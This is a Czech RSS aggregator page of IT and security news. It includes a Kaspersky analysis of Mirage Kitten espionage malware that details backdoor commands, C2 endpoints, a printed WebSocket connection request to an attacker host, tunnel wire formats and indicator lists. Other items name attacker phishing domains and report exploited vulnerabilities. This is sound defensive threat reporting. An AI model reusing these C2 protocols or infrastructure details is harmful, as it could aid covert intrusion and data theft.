Agregátor RSS

Připojili jste se k palubní Wi-Fi Českých drah, ale internet nefunguje? Zkuste tohle

Živě.cz - 5 hodin 14 min zpět
Pravidelně teď cestuji Pendolinem napříč republikou. Palubní síť CDWiFi hlásí plný signál, ale internet nejede. Není to přitom páteřním spojením, protože České dráhy se spoléhají na 5G tuzemských mobilních operátorů (případně Starlink) a na mobilu po většinu cesty síť funguje. Máte-li stejný ...
Kategorie: IT News

Anthropic rejects open-weight AI bans, calls for China chip controls and safety tests

Computerworld.com [Hacking News] - 5 hodin 45 min zpět

Anthropic CEO Dario Amodei has argued that policymakers should keep lower-risk open-weight AI accessible while placing stricter safeguards around frontier systems, including mandatory testing and limits on China’s access to advanced computing and model capabilities.

In a post outlining Anthropic’s position, Amodei said broad restrictions, including bans on Chinese open-weight models used by US businesses, would not address his main national security concerns. Instead, he pointed to the possibility of authoritarian governments surpassing the US in advanced AI, as well as cyber, biological, and alignment risks posed by increasingly capable systems.

Amodei also called for action against industrial-scale model distillation, which he said allows Chinese developers to improve their models with less computing power than would be needed to train comparable systems from scratch.

The statement followed criticism of Anthropic for not signing an industry letter backed by Nvidia, Microsoft, Meta, IBM, Mistral, Hugging Face and other technology companies urging policymakers to avoid premature restrictions on open-weight models.

The letter said that open weights could broaden access to AI, intensify competition, and enable organizations to adapt and deploy models without relying on a single provider. Amodei agreed with parts of that case but disputed claims that openness inherently improves safety research or gives defenders an advantage over attackers.

He said regulation should be based on a model’s capabilities and risks rather than whether its weights are openly available. Under that approach, sufficiently capable open and closed models would undergo testing before release.

Conditional support

Analysts said Anthropic had moved closer to industry consensus by rejecting blanket bans, but its support remained more limited than the approach backed by many major technology companies.

Deepika Giri, head of research for AI, analytics, and data at IDC, said the Nvidia-backed letter presented open weights as strategic infrastructure that should remain broadly accessible, in contrast with Anthropic’s more restrictive position.

Amodei’s statement clarified that Anthropic supports open-weight models only under certain conditions, a stance that could also help the company preserve its competitive advantages as a proprietary model provider focused on compliance and tighter controls, according to Lian Jye Su, chief analyst at Omdia.

The statement was “a real olive branch” to supporters of open-weight models, according to Pareekh Jain, CEO of Pareekh Consulting. But he said the disagreement had shifted from whether such models should be released to where policymakers should draw the line.

“Anthropic still thinks that once a model gets powerful enough, releasing its weights publicly is riskier than keeping it locked behind an app, because you can never take it back or add safety fixes later,” Jain said.

Will the controls work?

Analysts differed over whether Anthropic’s proposed controls would achieve their aims without creating new barriers for smaller AI developers.

Jain said chip restrictions and measures against illicit model distillation would mainly affect model developers and infrastructure providers, rather than enterprises using models already on the market. Mandatory safety testing, however, could raise development costs and reduce the number of advanced open-weight models available.

“Testing is expensive and time-consuming, and so, giant, well-funded companies like Anthropic, Google and OpenAI can afford it,” Jain said. Smaller developers seeking to release cutting-edge open-weight models could struggle to meet the same requirements, he added.

The additional testing and screening could also restrict the number of open-weight models available to enterprises, according to Su. He said the requirements could weaken some of their principal benefits, including lower costs, reduced vendor dependence and community-led development.

Anand Joshi, managing director of market research firm JP Data, questioned whether limiting China’s access to advanced chips would materially slow its AI development, arguing that Chinese companies had shown they could build highly capable models with less computing power. He supported action against illicit distillation, however, saying safeguards were needed to prevent developers from reproducing the capabilities of other models without authorization.

The impact on most enterprise users could remain limited if less capable models were exempted, Jain said. Businesses deploying models that fall below the proposed testing threshold would probably face little additional cost.

How CIOs should choose

Giri said CIOs should assess models according to their capabilities rather than whether they are open, and should demand independent testing, clear licensing, model documentation and accountability for monitoring and incident response.

“Mandatory safety testing should be triggered by a model’s demonstrated capabilities, not its size or training cost,” Jain said, particularly when a system could significantly assist cyberattacks, biological misuse, or autonomous harmful actions.

Before deployment, CIOs should seek independent evaluations, detailed model documentation, security test results and information about the model’s software supply chain, he added. Charlie Dai, principal analyst at Forrester, said that assessment should include documented red-team results, model provenance, disclosures about training and fine-tuning, and evidence of independent testing against recognized safety benchmarks.

Kategorie: Hacking & Security

Microsoft’s Nadella calls out Big AI for hypocrisy — but what about his own company?

Computerworld.com [Hacking News] - 5 hodin 59 min zpět

The 19th-century French novelist Honore de Balzac is believed to have said that behind every great fortune lies a great crime.

That’s even more true today than it was 200 years ago — just look at how Big AI, including Anthropic, OpenAI, Google, and others have built their trillion-dollar fortunes. 

They all use vast amounts of copyrighted material to train their large language models (LLMs) without paying the copyright holders. In other words, they steal it. They don’t call it stealing, though. They call it “fair use,” which in this case amounts to the same thing.

Generative AI (genAI) training requires massive amounts of text. The better-written and more information-dense that text is, the more it helps. AI gets a lot smarter a lot faster when it’s trained on well-written books and magazine and newspaper articles than when it’s trained on social media banter (or most everything else you find on the internet).

Since the dawn of AI, companies have been hoovering up copyrighted material wherever they find it — on the open web, behind paywalls, even in manually scanned books — and then used the scanned text. And they do it all without asking authors’ or publishers’ permissions, and without paying them.

It’s the greatest intellectual property theft in history by a long shot — billions and billions of dollars worth. Books, articles, music, photographs, artwork, you name it. If a human being has created it, Big AI has likely grabbed it and ingested it without asking, then made big profits off it.

I know this from personal experience; I’ve got skin in the game. Big AI companies have used at least 30 of my books to train their models without asking.  And that’s only what I’ve confirmed. Big AI might well have stolen even more. And it also might have stolen many of the thousands of articles I’ve written through the years.

For the AI bigwigs, it’s standard operating procedure. So it was surprising to see Microsoft CEO Satya Nadella calling out Big AI for its hypocrisy in using other people’s intellectual property without paying, then crying foul when small AI companies use Big AI’s work to train their own models using a technique called distillation.

He wrote on X: “While the great innovation that comes from model providers having fair use rights to train models on public data is needed, I find it ironic that the status quo is to then turn around and impose restrictive terms on distillation, and to reserve the right to learn from customer usage and interaction data.” 

One important note here: Nadella believes Big AI should be allowed to steal copyrighted material for training purposes. He makes that clear by his mention of “fair use.” His issue is that he believes smaller AI companies should be able to use Big AI’s work to train their models — and Big AI doesn’t want to let them do it.

Alistar Barr, in Business Insider, makes a related point: “Anthropic, OpenAI, and Google are discovering what the rest of the internet has already learned through painful experience: once you put something online, people will find ways to use it in ways you don’t like and can’t stop.” 

Before we look at whether Nadella is right in calling Big AI’s actions hypocritical, let’s examine the technique at the heart of the issue: distillation.

The lowdown on distillation

Distillation refers to an AI training technique in which you take outputs from one AI model, such as the answer to a prompt, and use that output to train your own model. AI companies do that quite frequently and have been doing so for a long time.

Barr explains distillation this way: “Distillation looks an awful lot like what AI companies have been doing to the rest of the internet. Scrape web content for free and without permission. Turn it into a product you sell. Argue it’s fair use. Hope the lawyers sort out the details later.”

Elon Musk has admitted his company xAI used distillation techniques to take output from competitor OpenAI to train xAI’s Grok chatbot. He explained, “Generally AI companies distill other AI companies.”

Analysts point out the AI industry is built on distillation. Neil Shah, vice president of research at Counterpoint Research says, “The reality is none of the models is an island and the entire industry has mostly evolved based on recursive learning. The newer entrants are in many instances going through the same routes of ‘distillation’ and ‘optimization.’”

It’s only become an issue now because Chinese AI companies have been using distillation techniques to catch up to American AI companies.

OpenAI CEO Sam Altman has been pressuring the US to take legal action against the Chinese companies.  Anthropic has piled on as well, saying the fight against distillation requires a coordinated response across the AI industry, cloud providers, and policymakers.

Hypocrisy or fair use?

So are OpenAI, Anthropic and other big US AI firms hypocritical, as Nadella claims? Absolutely. They’ve built their businesses on the theft of billions of dollars of stolen intellectual property and call it fair use. Now, they’re playing the victims when competitors do the same to them. (They’re also in some cases paying up; Anthropic just last week settled a copyright suit, paying out $1.5 billion.)

It’s good to see Nadella call out their hypocrisy. But Microsoft is as guilty of intellectual theft as the others — its AI Copilot is powered by OpenAI’s and Anthropic’s chatbots. The company faces major lawsuits for intellectual property theft. Among them is one by the New York Times, New York Daily News, and Center for Investigating Reporting, another by 400 local and regional newspapers, and another by 11 authors, including Pulitzer Prize winners Kai Bird, Jia Tolentino, and Daniel Okrent.

So, don’t praise Nadella for speaking out. Criticize him (and other AI tech leaders) for stealing billions of dollars in intellectual property from countless writers and publishers and calling it fair use.

Kategorie: Hacking & Security

Nejpopulárnější benchmark v nové verzi. Geekbench 7 má lépe změřit výkon počítačů a mobilů

Živě.cz - 6 hodin 14 min zpět
Společnost Primate Labs představila Geekbench 7, novou generaci svého multiplatformního benchmarku pro měření výkonu CPU a GPU. Aktualizace přináší dosud největší změny v historii nástroje a zaměřuje se na realističtější simulaci běžných úloh, které odpovídají současnému využití počítačů i mobilů. ...
Kategorie: IT News

Kutil si postavil elektromechanický televizor. IMAX to sice úplně není, ale stačí 3D tiskárna, LED a motorek

Živě.cz - 7 hodin 3 min zpět
Někdo má doma nejmodernější televizor za statisíce, no a pak je tu ještě James (Ancient) Brown, který podobné zbytečnosti nepotřebuje. Když si chce večer dopřát nějaké to domácí kino, rozžhaví 3D tiskárnu a jedno si vytiskne. Říká mu Scanwheel a je to vlastně elektromechanický televizor s ...
Kategorie: IT News

Reflex 2 Nvidia nikdy nevydala, slíbila ho před 1,5 rokem, na hráče se vykašlala

CD-R server - 7 hodin 29 min zpět
Za pár dní to bude 19 měsíců, co Nvidia představila Reflex 2, jehož vydání mělo následovat brzy po CES. Jenže k němu nedošlo dosud a uživatelé ztrácejí naději, že Nvidia vůbec někdy slovo dodrží…
Kategorie: IT News

Arista patches actively exploited VeloCloud bug as CISA puts admins on the clock

The Register - Anti-Virus - 7 hodin 44 min zpět
A critical flaw in Arista's VeloCloud Orchestrator has gone from zero to KEV in short order, with the networking giant confirming attackers are already exploiting it. The vulnerability, tracked as CVE-2026-16812, carries a maximum CVSS score of 10.0 and affects VeloCloud Orchestrator On-Prem, the self-hosted version of the software that enterprises use to centrally manage VeloCloud software-defined wide area networks (SD-WANs) connecting branch offices, datacenters, and clouds environments. According to Arista's security advisory, the flaw is an OS command injection vulnerability that allows an unauthenticated remote attacker to reach privileged internal functionality that was never meant to be exposed externally. Worse, Arista says the on-premises orchestrator is exposed by default, with no configuration capable of removing that exposure entirely. Exploitation requires access to the web interface but no credentials. Until administrators can patch, Arista recommends restricting that interface to trusted management networks and blocking IP addresses associated with observed attacks. "Successful exploitation may compromise the confidentiality, integrity, and availability of the orchestrator and data managed by the orchestrator," Arista warned. "Compromises to the VCO platform may allow attackers access to the VeloCloud Edge devices as well." Arista published three IP addresses observed conducting attacks, but otherwise kept its cards close to its chest. The company hasn't said who's exploiting the bug, when the attacks began, or how many customers have been affected, and didn't immediately respond to The Register's questions. Even without those details, the admission of in-the-wild exploitation was enough for CISA to add the flaw to its Known Exploited Vulnerabilities (KEV) catalog. The list is reserved for bugs with evidence of real-world abuse, and while the associated directive applies only to US federal civilian agencies, plenty of private sector security teams use KEV to decide which patches can't wait. The issue affects only on-premises deployments. Customers using Arista's hosted or dedicated VeloCloud Orchestrator service had already been patched before the advisory was published, the company said. Fixes are available in VeloCloud Orchestrator versions 5.2.3.14, 6.1.3.4, 6.4.2.4, and 7.0.0.1. Arista urged customers running earlier releases to upgrade immediately. Arista is far from the first vendor to issue a patch after attackers had already begun exploiting the flaw. Over the past year, a steady stream of networking gear, VPNs, firewalls, and other edge-facing enterprise software has followed the same pattern: by the time customers learn there's a problem, somebody else has already proved it's worth exploiting. ®
Kategorie: Viry a Červi

Data breach at medical billing firm MCBS affects 1.26 million people

Bleeping Computer - 7 hodin 49 min zpět
Healthcare billing company Medical Computer Business Services (MCBS) has disclosed that a 2025 network breach exposed the sensitive information of more than 1.2 million people. [...]
Kategorie: Hacking & Security

Chytrou zásuvku Shelly koupíte za 225 Kč, ale musíte vzít čtyři kusy. Měří spotřebu a obejde se bez cloudu

Živě.cz - 8 hodin 14 min zpět
Chytrá zásuvka Shelly Plug M Gen3 v sadě čtyř kusů vyjde na 899 Kč (225 Kč za kus). • Podporuje Wi-Fi, Bluetooth, Matter a vyrábí se v EU. • Shelly milují stavitelé chytrých domácností.
Kategorie: IT News

Critical TeamCity Flaw Could Let Attackers Run OS Commands Without Logging In

The Hacker News - 8 hodin 47 min zpět
JetBrains is urging customers of on-premise versions of TeamCity to update to the latest version following the discovery of a critical security issue that could result in arbitrary code execution. The vulnerability, assigned CVE-2026-63077 (CVSS score: 9.8), affects all TeamCity On-Premises versions. It has been addressed in versions 2025.11.7 and 2026.1.3. TeamCity Cloud instances have alreadyRavie Lakshmananhttp://www.blogger.com/profile/[email protected]
Kategorie: Hacking & Security

Researcher Says AI Helped Develop Linux Traffic-Control Race Into Root Exploit

The Hacker News - 8 hodin 54 min zpět
STAR Labs has published a Linux kernel exploit that turns an ordinary local user into root on the CentOS Stream 9 build it targeted. The flaw, tracked as CVE-2026-53264 (CVSS score: 7.8), is a use-after-free race in the kernel's network traffic-control subsystem.Researcher Lee Jia Jie said artificial intelligence (AI) helped him find the bug and speed up exploit development. This is local Swati Khandelwalhttp://www.blogger.com/profile/[email protected]
Kategorie: Hacking & Security

Mirage Kitten targets Middle East and Africa region with new malware

Kaspersky Securelist - 8 hodin 58 min zpět

Introduction

Mirage Kitten – also known as UNC1549, Smoke Sandstorm, and Nimbus Manticore – is an advanced persistent threat (APT) group focused on cyber-espionage operations against aerospace, aviation, defense, and telecommunications sectors across the Middle East and Africa, using highly targeted spear-phishing campaigns, fake recruitment portals, and custom multi-stage malware to gain persistent access and exfiltrate sensitive data.

During recent threat research, we identified a previously undocumented malware set developed and used by Mirage Kitten. The toolset includes NightLedger, a new Windows backdoor for reconnaissance, command execution, file operations, process discovery, and screenshot capture; and two custom WebSocket-based tunnelers, ArcBridge and BridgeHead, for covert network access and operator-controlled tunneling.

Technical details

Although the initial access vector remains unclear for most malware samples observed in this activity, we saw BridgeHead being deployed during post-exploitation activities in victim environments in Egypt and at a Pakistan-based aerospace and aviation organization. The deployment followed targeted spear-phishing activity consistent with tradecraft we recently documented as part of our private threat intelligence reporting service and publicly reported by Unit 42 and Check Point Research, including the use of highly tailored social engineering lures against selected targets. These lures included recruitment-themed content impersonating trusted brands and hiring platforms, as well as lookalike videoconferencing pages that redirected victims to malicious archives hosted on third-party file-sharing services.

NightLedger backdoor

NightLedger is a recently identified Windows backdoor that we attribute to Mirage Kitten based on code and behavioral similarities to the historical implants developed and used by the group. The implant masquerades as SspiCli.dll and appears to be designed for DLL search-order hijacking, targeting a legitimate AppVShNotify.exe binary. While AppVShNotify.exe does not directly import SspiCli.dll, it imports RPCRT4.dll, which can delay-load SspiCli.dll when it invokes an RPC API that requires authentication. This allows a co-located malicious SspiCli.dll to be loaded while forwarding expected exports to the legitimate DLL.

When started, the malicious DLL creates the mutex A8215357-F99A-44FE-BC65-D8F0434B0C03 to enforce a single running instance. If the mutex already exists, it exits immediately.

NightLedger periodically contacts its C2 over HTTPS, issuing an HTTP GET request to the /edfcvfgbhnjmkqwasderfgg endpoint at the realhealthshop[.]com domain, and uses tjconsultingservices[.]com as a fallback C2.

When a valid C2 response is received, the implant tokenizes the payload using the custom delimiter (#%%#) and passes the parsed fields to its command dispatcher. From a development standpoint, this is similar to TWOSTROKE, a backdoor attributed to the same APT and previously documented by GTIG, whose C2 response is hex-encoded and uses (@##@) as a field separator.

NightLedger supports the following commands:

Command ID Description 1 Gather user and host identity information 3 Execute a process/program 17 List directories 20 Download a file to the infected system 25 Gather host and network information 27 Copy a file 30 Update beacon interval 36 Take a screenshot 43 Load a DLL 56 Kill a process 62 Delete a file 69 Terminate thread 70 Upload file to C2 server via POST request to /qasxcdfvgbhnmyuioplkhnj 75 Enumerate logical drives 90 List processes 93 Collect C:\Windows\debug\NetSetup.log together with process-list output.
NetSetup.log is a Windows diagnostic log generated under C:\Windows\debug\ during domain/workgroup join, unjoin, and related network setup operations.

Command output is returned to the C2 via an HTTP POST request to /wsdefvvbnhyuijkplmbgfrtt.

BridgeHead – a WebSocket tunneler

During our investigation, we encountered a tunnel proxy deployed as unbcl.dll in the %LocalAppData%\Microsoft\VisualStudio directory on a machine in Egypt. We also identified a similar deployment in a Pakistan-based environment, where the tunneling tool was stored as C:\program files (x86)\univpn\promote\libwinpthread-1.dll. The malware dynamically loads advapi32.dll, resolves GetUserNameA, retrieves the current Windows username, converts it to lowercase, and searches for a specific substring in it. This behavior suggests prior reconnaissance was performed within the internal network and the username check is needed to make sure it runs on a specific machine. This is potentially intended to prevent execution of the standalone malware sample inside virtual analysis systems. If the substring is not found, the function returns silently without activating.

If the username check was successful, the tunneler establishes an HTTPS WebSocket connection as follows:

GET /connect HTTP/1.1 Host: smartconnect.azurewebsites.net Upgrade: websocket Connection: Upgrade User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.75 Safari/537.36 Edg/86.0.622.38

The server responds with HTTP 101 (Switching Protocols) to complete the WebSocket upgrade. After the upgrade, the client sends a binary WebSocket message containing the literal string "token" as authentication. The server must respond within 10 seconds, or the connection is dropped and retried with exponential backoff.

The malware’s next action depends on the HTTP response returned by the server:

HTTP response Description 407 (Proxy Auth Required) Queries supported auth schemes via WinHttpQueryAuthSchemes, selects Negotiate (0x10) or NTLM (0x2) in that exact order, sets Windows SSO credentials (null username/password), retries up to 3 times. 101 (Switching Protocols) Success. Proceeds to WebSocket upgrade and authentication. Other Connection failed. Closes all handles, enters backoff.

This implementation closely mirrors the enterprise proxy traversal logic seen in the backdoor we track internally as Retrograde, which overlaps with tooling publicly reported as MiniFast/MiniUpdate, attributed to the same APT group. The implant is designed to operate through corporate proxy environments by handling HTTP 407 responses, negotiating Windows-integrated proxy authentication with Negotiate preferred over NTLM, retrying with the current user’s SSO context, and falling back to exponential C2 connection retry logic capped at 60 seconds.

Once the WebSocket channel is established and authenticated, the implant functions as a full SOCKS5 tunnel proxy. The C2 server initiates all tunnel connections by sending binary commands over the WebSocket; the implant simply forwards traffic between server‑specified targets and the WebSocket channel. This makes it a relay node: the operator runs tools server‑side, and all resulting TCP traffic is tunneled through the victim’s machine as if originating from the victim’s network.

All tunnel communication uses a fixed binary wire format:

Offset Size Field Encoding 0 1 type Message type (1–9) 1 4 connId Tunnel connection identifier 5 1 flags Status or error indicator 6 2 dataLen Payload length 8 var payload Message data

Every message is at least 8 bytes. Seven message types are actively used:

Type Name Direction Description 1 CONNECT Server -> Client Open a new TCP tunnel to a SOCKS5 target address 2 CONNECT_RESPONSE Client -> Server Confirm the connection was established 3 DATA Bidirectional Relay TCP traffic through the tunnel 4 DISCONNECT Bidirectional Close a tunnel connection 5 PING Bidirectional Keepalive probe, sent every 30 seconds by timer 6 PONG Bidirectional Keepalive reply 9 FLOWCTRL Bidirectional Throttle data flow to prevent buffer overrun

The CONNECT payload specifies where the implant should open a TCP connection. The target address is encoded in SOCKS5 format and consists of a single type byte, followed by the address and a 2-byte destination port:

Type byte Description 0x01 IPv4 address (4 bytes) 0x03 Domain name (1-byte length + string) 0x04 IPv6 address (16 bytes)

Notably, in the process of threat hunting, we detected another variant (MD5: C832ECD135781B11F59E3FFFB3D2B6AC) that shares the same dynamic-resolve stub pattern. This variant communicates with businessmixture.com/blog over WSS on port 443, and not through Microsoft Azure. Still, it implements the same technique of limiting execution to a specific username on the infected machine by hardcoding a 3-character control value that must appear as a substring in the lowercased Windows username retrieved via GetUserNameA. If the match fails, the implant silently exits, confirming per-target tailoring of each deployed binary.

ArcBridge: another WebSocket tunneling tool

ArcBridge is another WebSocket tunneling tool developed and used by Mirage Kitten. We first identified it in April 2026 in activity targeting victims in the Middle East. The malware creates a mutex named F56E68DA-4A89-46B4-9AC8-7290A7651000 to enforce single-instance execution. The use of a UUID-like mutex name is consistent with the NightLedger backdoor described earlier.
The malware contains an embedded configuration block that stores the C2 host, C2 port, retry or timeout value, SSL flag, and what is highly likely an implant identifier:

"<<STARTXX>>" "aecert.org" 443 5000 0 "4B8CC395-A26F-41F1-A1DC-8B993D9D41D2" "<<ENDXX>>"

After initialization, ArcBridge communicates over a WebSocket-style channel and waits for server-side control messages. It supports the following commands:

Command Description OPEN: Creates a proxy/tunnel session to a target selected by the operator. DNS: Performs hostname or address resolution and returns the result. Victimology

According to our telemetry, we identified victims across Middle East and African countries including Egypt, SMB and government environments in Jordan and Tanzania, aviation organizations in Pakistan, telecommunication companies in Ethiopia and financial-sector entities in Burkina Faso.

Conclusion

Mirage Kitten continues to evolve its malware arsenal to support targeted cyber-espionage operations across the Middle East and Africa regions. The NightLedger backdoor retains similar core command functionality to TWOSTROKE while introducing additional capabilities, including screenshot capture and collection of the NetSetup.log file.

Another notable aspect of the campaign is the group’s continued reliance on tunneling utilities as part of its operational toolkit. This aligns with previous public reporting, which documented the group’s use of the LIGHTRAIL and POLLBLEND tunnelers. Consistent with this tradecraft, we observed Mirage Kitten continuing to leverage tunneling capabilities alongside a gradual shift away from Microsoft Azure subdomain-style infrastructure in favor of Cloudflare-backed domains in some of its malware, a change likely intended to complicate attribution while maintaining resilient command-and-control communications.

Indicators of compromise

Additional IoCs are available to customers of our Threat Intelligence Reporting service. For more details, contact us at [email protected].

File hashes

NightLedger backdoor
A239E655709A2518DD0B7BDBED163679 – sspicli.dll

ArcBridge WebSocket tunneling tool
5FA15EF96808EA82F0A6176F0BB4B386
42F847597109DA2A220391BB09D00676
AFB1C1583606599C7272CFB33CC6F498

BridgeHead WebSocket tunneling tool
6038D42AF0AFFD1FB263F470C0956F6B – unbcl.dll
AE628EFA305387B633DCE82F9364875B – unbcl.dll
F7D36CC5904A53252D2BB3D21615134F – libwinpthread-1.dll
C90F0EFADBF322E5EB1C4103A38C30E6 – libwinpthread-1.dll
D09B14A2FE01C7363ECC56F5D046162C – IPHLPAPI.dll

Domains and IPs

smartconnect[.]azurewebsites[.]net
businessmixture[.]com
global-reds[.]com
maadinglobal[.]com
Business-deegital[.]com
business-deegital[.]azurewebsites[.]net
businessdeegital[.]azurewebsites[.]net
neexportfolio[.]azurewebsites[.]net
neexportfolio[.]com
neexportfolio[.]eastus[.]cloudapp[.]azure[.]com
172[.]86[.]98[.]113
aecert[.]org
realhealthshop[.]com
tjconsultingservices[.]com
thehealth-life[.]com
buisness-centeral-transportation[.]com
healthcarezoom-centeral[.]azurewebsites[.]net
healthcarezoomcenteral[.]azurewebsites[.]net
healthcarezoomcenteral[.]org
toadreport[.]azurewebsites[.]net
business-startup[.]azurewebsites[.]net
businessstartup[.]azurewebsites[.]net

Utečte Googlu i Netflixu. Průvodce selfhostingem a výběr nejlepších aplikací pro NAS

Živě.cz - 10 hodin 14 min zpět
Za aplikace typu Google Drive, Spotify, Netflix, Homey nebo 1Password je potřeba platit předplatné, které může šplhat do tisíců měsíčně. Alternativou přitom může být selfhosting, kdy alternativy k velkým platformám běží na domácím NASu.
Kategorie: IT News

Microsoft Says New Cybersecurity AI Model Helps MDASH Score 95.95% at Half the Cost

The Hacker News - 10 hodin 1 min zpět
Microsoft has launched its first cybersecurity-specific model inside MDASH, its multi-model vulnerability identification and remediation harness. The company says MDASH, using MAI-Cyber-1-Flash and GPT-5.4, scored 95.95% on CyberGym. It also claims the configuration costs 50% less than its current best MDASH combination of GPT-5.4, GPT-5.4 mini, and GPT-5.3 Codex. Access is limited to approved Swati Khandelwalhttp://www.blogger.com/profile/[email protected]
Kategorie: Hacking & Security

Baterie elektromobilů vydrží mnohem déle, než se čekalo před 10 lety. Obavy z jejich stárnutí ztrácejí smysl

Živě.cz - 11 hodin 14 min zpět
Současné trakční baterie degradují výrazně pomaleji než před deseti lety • Po pěti letech provozu si elektromobily průměrně zachovávají 95 % dojezdu • Životnost článků zásadně prodlužuje správné nabíjení a styl dynamické jízdy
Kategorie: IT News

Architektura GCN po 15 letech končí, CDNA 5 již vychází z RDNA

CD-R server - 11 hodin 19 min zpět
Architektura, která navzdory přizabití ze strany Roryho Reada získala AMD konzole a umožnila společnosti přežít krizi, a která AMD dostala do nejvýkonnějších výpočetních systémů na světě, končí…
Kategorie: IT News

Attackers Exploit Arista VeloCloud Orchestrator Command Injection Flaw

The Hacker News - 12 hodin 15 min zpět
A maximum-severity security flaw impacting on-premises versions of Arista VeloCloud Orchestrator (VCO) has come under active exploitation in the wild. The vulnerability, tracked as CVE-2026-16812 (CVSS score: 10.0), is a case of operating system command injection that could pave the way for arbitrary code execution. "VeloCloud Orchestrator (VCO) on-prem has a security issue where this issue Ravie Lakshmananhttp://www.blogger.com/profile/[email protected]
Kategorie: Hacking & Security

Hackers are compromising hotel Wi-Fi gateways to hijack Microsoft 365 accounts

Computerworld.com [Hacking News] - 14 hodin 26 min zpět

Traveling enterprise employees beware: Think twice before you log onto that oh-so-convenient public Wi-Fi.

Since at least June, threat actors have been compromising “captive” Wi-Fi gateways and other portal appliances at hotels, conference centers, and similar shared venues to hijack users’ Microsoft 365 accounts, according to the ReliaQuest Threat Research team.

Once a threat actor controls a gateway, they can silently redirect a user’s traffic to their own infrastructure and steal their Microsoft 365 credentials without ever touching the user’s device, compromising endpoints, or sending phishing links or malicious attachments.

“The most dangerous element is that it operates at the network gateway, which sits beneath most of the trust assumptions users and devices make,” ReliaQuest told CSO Online. “It’s not necessarily an enterprise breach level event on its own, but it’s a very real risk to individual accounts.”

Exploiting a ‘fundamental trust’

Domain Name System (DNS) poisoning, in which false data is injected to redirect regular web traffic to fraudulent domains, has previously been observed on small office routers, but attackers are now expanding the technique to higher-level targets, the ReliaQuest researchers explained in a blog post.

Attackers likely gain access to the gateways through weak or reused admin credentials in combination with exposed interfaces like Secure Shell (SSH), Simple Network Management Protocol (SNMP), and other web consoles, they pointed out.

Admin access to the gateway is all that malicious actors need, because devices are designed to inherently trust DNS, which translates domain names like login.microsoftonline[.]com into IP addresses to route them. Therefore, a single gateway compromise gives the attacker the ability to redirect traffic for every guest logging into the network, providing IP addresses it controls in response to DNS requests, rather than the legitimate ones, without touching a single endpoint.

“Captive portal appliances sit at the network perimeter for every guest on that network,” the researchers wrote. “Detection is inherently difficult because the attack happens gateway-side, outside the endpoint’s visibility.”

In the campaign tracked by ReliaQuest, four attacker-registered domains, m365-owa[.]com, owa-ms365[.]com, ms365-device[.]com, and ms365-live[.]com, were used for Microsoft-impersonation lures.

The compromised Wi-Fi gateways were discovered across multiple US cities as well as in India and Saudi Arabia, and impacted users were from companies in professional and financial services, legal, retail, health care, and energy, indicating that the method isn’t sector-specific.

“We’ve seen enough SharePoint exfiltration cases to know that a single popped account can cascade into meaningful data loss,” ReliaQuest noted. Meanwhile, for the network operators, there’s a “reputational dimension”; user compromise is a “serious trust and brand problem, regardless of how sophisticated’ the underlying attack is.”

Safe services, DNSSEC not enough

Locking network configurations to a ‘safe’ DNS provider such as Google (8.8.8.8), Cloudflare (1.1.1.1), or the cloud-based OpenDNS isn’t a sufficient tactic, because it doesn’t change the path that queries actually travel over, ReliaQuest contended.

By default, devices send DNS queries as unencrypted protocol traffic, and those packets still have to traverse the hotel’s network to reach Google, Cloudflare, or OpenDNS, the company explained. Since the gateway sits directly in that path, it can inspect, block, or redirect the query before it ever reaches the chosen resolver.

“Specifying a trusted DNS server changes the intended destination, not who controls the road to get there,” ReliaQuest noted.

Further, Domain Name System Security Extensions (DNSSECs), which use digital signatures and public-key cryptography, only “partially” address the problem. DNSSEC provides authentication and integrity for signed domains, which means a validating resolver can detect and reject forged or tampered responses.

“What it does not do is provide confidentiality or availability,” the company said. “It does not encrypt DNS traffic or stop an attacker from intercepting, blocking, or redirecting requests.”

So while DNSSEC can defeat certain response-forgery attacks against signed zones, an on-path gateway can still see queries, drop them, or force fallback behavior. However, this protection layer only helps when domains are actually signed, and then only when the client or resolver performs validation, which “many stub resolvers do not,” according to ReliaQuest.

Full-tunnel VPNs required

To combat the problem, enterprises should require all corporate devices to use a full-tunnel VPN for network connection. Controls should prevent internet access until a tunnel is active, ReliaQuest advised.

This will route all of a device’s traffic, including DNS, through an encrypted connection to a trusted VPN server before it travels anywhere else, the company explained, thus preventing local networks like hotel gateways from seeing or modifying DNS and internet traffic.

“In effect, it takes the untrusted network out of the trust equation,” ReliaQuest noted.

However, full-tunnel configuration is not the default for VPNs, because it comes with “real trade-offs,” the researchers noted: It adds cost, latency, and bandwidth demands, since every packet has to travel through company infrastructure. Thus, forcing all traffic through the corporate backbone is “not always practical” for distributed or bandwidth-heavy workforces.

Enterprises should also enforce conditional access in Entra ID to block device-code authentication flow, which has few legitimate use cases for most users in most environments, ReliaQuest noted.

Additional precautions

The company also advised:

  • Restricting Proxy Auto-Configuration (PAC) file retrieval to approved internal hosts;
  • Disabling automatic Web Proxy Auto-Discovery (WPAD) via Group Policy to (this is often enabled by default in Windows);
  • Deploying encrypted DNS such as DoH or DoT in strict mode as a “complement or alternative” to full-tunnel VPN. This is particularly important for organizations where always-on VPN is not feasible.
  • Training employees to verify the URL and certificate of any page requesting credentials before entering them, particularly on public Wi-Fi networks.

Prevention is more important than detection here, ReliaQuest pointed out: while in tools like Microsoft Defender for Endpoint, ‘DnsConnectionInspected’ events showing queries to attacker-controlled domains are a primary endpoint-level signal, “by the time those events fire, the redirect has typically already occurred. In other words, endpoint telemetry confirms what happened more than it prevents it.”

This is exactly why methods like encrypted transport, Conditional Access, and WPAD and PAC hardening matter more than detection alone, the researchers emphasized.

This article originally appeared on CSOonline.

Kategorie: Hacking & Security
Syndikovat obsah